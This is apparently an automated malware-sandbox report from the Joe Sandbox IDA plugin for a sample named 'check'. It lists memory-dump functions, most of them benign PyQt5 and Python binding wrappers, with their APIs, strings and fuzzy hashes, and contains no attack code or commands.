Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Variant@@$?setFormat@@Property@String@@@TextVariant@@@
String ID: BJ1$QTextListFormat$setNumberPrefix$setNumberPrefix(self, np: Optional[str])
API String ID: 3611022156-3874734507
Opcode ID: eb87e573d4d2fe450092bc6a9b621f189218cc463c6fea08faa12381d5a7b597
Instruction ID: 503e7ec277b20cc89c6bd68ca14d620c32fcef481b633aa15ad7c7f36fdde888
Opcode Fuzzy Hash: eb87e573d4d2fe450092bc6a9b621f189218cc463c6fea08faa12381d5a7b597
Instruction Fuzzy Hash: 1C31F536B08B8AC2DB009F65E8985AE73B4FB48BA4F654032CA5E43724DF3DD949C740

Function 00007FFD86298E10 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 54COMMON

Download Yara Rule

APIs

??BQBrush@@QEBA?AVQVariant@@XZ.QT5GUI ref: 00007FFD86298E8A
?setProperty@QTextFormat@@QEAAXHAEBVQVariant@@@Z.QT5GUI ref: 00007FFD86298E9D
??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FFD86298EA8

Strings

setBackground(self, brush: Union[QBrush, Union[QColor, Qt.GlobalColor], QGradient]), xrefs: 00007FFD86298EF4
setBackground, xrefs: 00007FFD86298F00
BJ1, xrefs: 00007FFD86298E25
QTextFormat, xrefs: 00007FFD86298F07

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Variant@@$?setBrush@@Format@@Property@TextVariant@@@
String ID: BJ1$QTextFormat$setBackground$setBackground(self, brush: Union[QBrush, Union[QColor, Qt.GlobalColor], QGradient])
API String ID: 3306687108-239742555
Opcode ID: 20db86018a7db130fe44fd45059f49b6ec98c0464667e2efdf690b96fef73025
Instruction ID: f0534c45bf7b8134b3223f19218451637241e3db7a1e6799822547f7973b6580
Opcode Fuzzy Hash: 20db86018a7db130fe44fd45059f49b6ec98c0464667e2efdf690b96fef73025
Instruction Fuzzy Hash: B231F536B08B8AC1DB109F26E8985AE73B4FB88BA4F654132CA5D43724DF3CD949C740

Function 00007FFD8626CDE0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 54COMMON

Download Yara Rule

APIs

??0QVariant@@QEAA@AEBVQString@@@Z.QT5CORE ref: 00007FFD8626CE5A
?setProperty@QTextFormat@@QEAAXHAEBVQVariant@@@Z.QT5GUI ref: 00007FFD8626CE6D
??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FFD8626CE78

Strings

setNumberSuffix(self, ns: Optional[str]), xrefs: 00007FFD8626CEC4
setNumberSuffix, xrefs: 00007FFD8626CED0
BJ1, xrefs: 00007FFD8626CDF5
QSyntaxHighlighter, xrefs: 00007FFD8626CED7

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Variant@@$?setFormat@@Property@String@@@TextVariant@@@
String ID: BJ1$QSyntaxHighlighter$setNumberSuffix$setNumberSuffix(self, ns: Optional[str])
API String ID: 3611022156-631295360
Opcode ID: ff7de7ce017ccedf59d77120346046019a28996bf234080fa9a2d1c5e81109fb
Instruction ID: 7bdd32a0ae2fbae0f6fb57329b5880237912e1100a52259670570394fd2bc3db
Opcode Fuzzy Hash: ff7de7ce017ccedf59d77120346046019a28996bf234080fa9a2d1c5e81109fb
Instruction Fuzzy Hash: 6E31F536B08B8682DB009F26E8985AE73B4FB48BA4F654072CA5E43724DF3CD949C740

Function 00007FFD86249000 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 53threadCOMMON

Download Yara Rule

APIs

PyEval_SaveThread.PYTHON3 ref: 00007FFD86249054
?sender@QObject@@IEBAPEAV1@XZ.QT5CORE ref: 00007FFD86249062
PyEval_RestoreThread.PYTHON3 ref: 00007FFD8624906E

Strings

QWindow, xrefs: 00007FFD862490E8
sender(self) -> Optional[QObject], xrefs: 00007FFD862490D5
sender, xrefs: 00007FFD862490E1
qtcore_qobject_sender, xrefs: 00007FFD86249091

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Eval_Thread$?sender@Object@@RestoreSave
String ID: QWindow$qtcore_qobject_sender$sender$sender(self) -> Optional[QObject]
API String ID: 10903585-2054900951
Opcode ID: 1619a3a43605f06a2f74948926c97f87eaf72143d025683031250ac7071295f9
Instruction ID: 9b83e4ddf1f631c4335795a36502b9f628b7605a388f050624f50a269d5b963c
Opcode Fuzzy Hash: 1619a3a43605f06a2f74948926c97f87eaf72143d025683031250ac7071295f9
Instruction Fuzzy Hash: 03212875B0DB86C1EB009F55E8A86AD37A4FB48BA0F594072CA4D43724EF3DE989C700

Function 00007FFD86229040 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 53threadCOMMON

Download Yara Rule

APIs

PyEval_SaveThread.PYTHON3 ref: 00007FFD86229094
?sender@QObject@@IEBAPEAV1@XZ.QT5CORE ref: 00007FFD862290A2
PyEval_RestoreThread.PYTHON3 ref: 00007FFD862290AE

Strings

QTextBlockGroup, xrefs: 00007FFD86229128
sender(self) -> Optional[QObject], xrefs: 00007FFD86229115
sender, xrefs: 00007FFD86229121
qtcore_qobject_sender, xrefs: 00007FFD862290D1

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Eval_Thread$?sender@Object@@RestoreSave
String ID: QTextBlockGroup$qtcore_qobject_sender$sender$sender(self) -> Optional[QObject]
API String ID: 10903585-813202499
Opcode ID: 507ce06cd210d8cc553f4f6d6de39b2b171ac8b55df36a66c64e7c35a5a4bf06
Instruction ID: a97507898d4200853a3645cc866c9b308857936e38ae402ef50b632f968aebcf
Opcode Fuzzy Hash: 507ce06cd210d8cc553f4f6d6de39b2b171ac8b55df36a66c64e7c35a5a4bf06
Instruction Fuzzy Hash: 8D212C35B0DB4681EB009F55E8A86AD77A4FB48BE0F994071CA4D43724EF3DE959C700

Function 00007FFD86270200 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 53threadCOMMON

Download Yara Rule

APIs

PyEval_SaveThread.PYTHON3 ref: 00007FFD86270254
?sender@QObject@@IEBAPEAV1@XZ.QT5CORE ref: 00007FFD86270262
PyEval_RestoreThread.PYTHON3 ref: 00007FFD8627026E

Strings

sender(self) -> Optional[QObject], xrefs: 00007FFD862702D5
sender, xrefs: 00007FFD862702E1
QPdfWriter, xrefs: 00007FFD862702E8
qtcore_qobject_sender, xrefs: 00007FFD86270291

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Eval_Thread$?sender@Object@@RestoreSave
String ID: QPdfWriter$qtcore_qobject_sender$sender$sender(self) -> Optional[QObject]
API String ID: 10903585-3596320349
Opcode ID: 0bed4c599f457ed3b6492e3c3559f8beb6219d6b126aaa848f420c9b0d74fe39
Instruction ID: 3daeaa02ea21d236920d6bf3b6ea0d448edfa23fb352c8763ee93fdd47f7ce60
Opcode Fuzzy Hash: 0bed4c599f457ed3b6492e3c3559f8beb6219d6b126aaa848f420c9b0d74fe39
Instruction Fuzzy Hash: 02212875B1DB8681EB009F55E8A86AD33A4FB48BA0F590072DE4D03724EF3DE989C740

Function 00007FFD8622C220 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 53threadCOMMON

Download Yara Rule

APIs

PyEval_SaveThread.PYTHON3 ref: 00007FFD8622C274
?sender@QObject@@IEBAPEAV1@XZ.QT5CORE ref: 00007FFD8622C282
PyEval_RestoreThread.PYTHON3 ref: 00007FFD8622C28E

Strings

sender(self) -> Optional[QObject], xrefs: 00007FFD8622C2F5
QStandardItemModel, xrefs: 00007FFD8622C308
sender, xrefs: 00007FFD8622C301
qtcore_qobject_sender, xrefs: 00007FFD8622C2B1

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Eval_Thread$?sender@Object@@RestoreSave
String ID: QStandardItemModel$qtcore_qobject_sender$sender$sender(self) -> Optional[QObject]
API String ID: 10903585-2647080779
Opcode ID: c7125dcaea6e4b1e5324b5258cbb5684e8f0c3f0147666c4d300a496a4c789c9
Instruction ID: 7f3bee6f3bced5e3e7f00fab19f3b62407a86684309bbb98ff3bd65f0961651e
Opcode Fuzzy Hash: c7125dcaea6e4b1e5324b5258cbb5684e8f0c3f0147666c4d300a496a4c789c9
Instruction Fuzzy Hash: D8212A75B0DB4681EB409F55E8A86AD77A4FB48BA0F994072CA4D43724EF3CE989C700

Function 00007FFD86268D80 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

??0QVariant@@QEAA@H@Z.QT5CORE ref: 00007FFD86268DFD
?setProperty@QTextFormat@@QEAAXHAEBVQVariant@@@Z.QT5GUI ref: 00007FFD86268E10
??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FFD86268E1B

Strings

setQuality, xrefs: 00007FFD86268E4F
QTextImageFormat, xrefs: 00007FFD86268E56
B|i, xrefs: 00007FFD86268DC3
setQuality(self, quality: int = 100), xrefs: 00007FFD86268E43

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Variant@@$?setFormat@@Property@TextVariant@@@
String ID: B|i$QTextImageFormat$setQuality$setQuality(self, quality: int = 100)
API String ID: 3865857979-400816983
Opcode ID: 1310c5bc8428d86f2d2dc5540b1f991aae5f89e6dc8e01ad72dca720db4d07de
Instruction ID: 9d8c0150f6d898aad0b4ea71cab56bfa8d49a73514bf8b10f2bac32d030d9590
Opcode Fuzzy Hash: 1310c5bc8428d86f2d2dc5540b1f991aae5f89e6dc8e01ad72dca720db4d07de
Instruction Fuzzy Hash: 09210332B08B5A96EB00DF15E8980AD33A5FB88BA4FA50136DA5D43720DF3DD91AC740

Function 00007FFD875917A0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 122COMMON

Download Yara Rule

APIs

PyType_IsSubtype.PYTHON313 ref: 00007FFD8759186C
PyUnicode_FromString.PYTHON313 ref: 00007FFD875918D1
_PyArg_BadArgument.PYTHON313 ref: 00007FFD87593BEE

Strings

category, xrefs: 00007FFD87593BE7
argument, xrefs: 00007FFD87593BE0
a unicode character, xrefs: 00007FFD87593BD9

Memory Dump Source

Source File: 0000000F.00000002.2691104187.00007FFD87591000.00000020.00000001.01000000.00000040.sdmp, Offset: 00007FFD87590000, based on PE: true

Associated: 0000000F.00000002.2691050427.00007FFD87590000.00000002.00000001.01000000.00000040.sdmpDownload File
Associated: 0000000F.00000002.2691163302.00007FFD87596000.00000002.00000001.01000000.00000040.sdmpDownload File
Associated: 0000000F.00000002.2691163302.00007FFD875DA000.00000002.00000001.01000000.00000040.sdmpDownload File
Associated: 0000000F.00000002.2691163302.00007FFD875E8000.00000002.00000001.01000000.00000040.sdmpDownload File
Associated: 0000000F.00000002.2691163302.00007FFD87637000.00000002.00000001.01000000.00000040.sdmpDownload File
Associated: 0000000F.00000002.2691515219.00007FFD8763A000.00000004.00000001.01000000.00000040.sdmpDownload File
Associated: 0000000F.00000002.2691572339.00007FFD8763C000.00000002.00000001.01000000.00000040.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd87590000_check.jbxd

Similarity

API ID: Arg_ArgumentFromStringSubtypeType_Unicode_
String ID: a unicode character$argument$category
API String ID: 1318908108-2068800536
Opcode ID: 819d02cb5a53b99fb765d21f9d19cde95ec2cc2e6cea83f9e4c806781089034f
Instruction ID: 7f8470aa4f91b9674516a2650e61f407a4027b4b33a86696f36492aa74f4d0d5
Opcode Fuzzy Hash: 819d02cb5a53b99fb765d21f9d19cde95ec2cc2e6cea83f9e4c806781089034f
Instruction Fuzzy Hash: 2A51D362F58A6282FB5A8B05F4703B863B2FB45B94F4400B5DA8F87794DF2CE895D300

Function 00007FFD8626CF20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

PyType_IsSubtype.PYTHON3 ref: 00007FFD8626CF47
??YQRegion@@QEAAAEAV0@AEBV0@@Z.QT5GUI ref: 00007FFD8626CFD8
??YQRegion@@QEAAAEAV0@AEBVQRect@@@Z.QT5GUI ref: 00007FFD8626D02D

Strings

1J9, xrefs: 00007FFD8626CFA8, 00007FFD8626D005

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

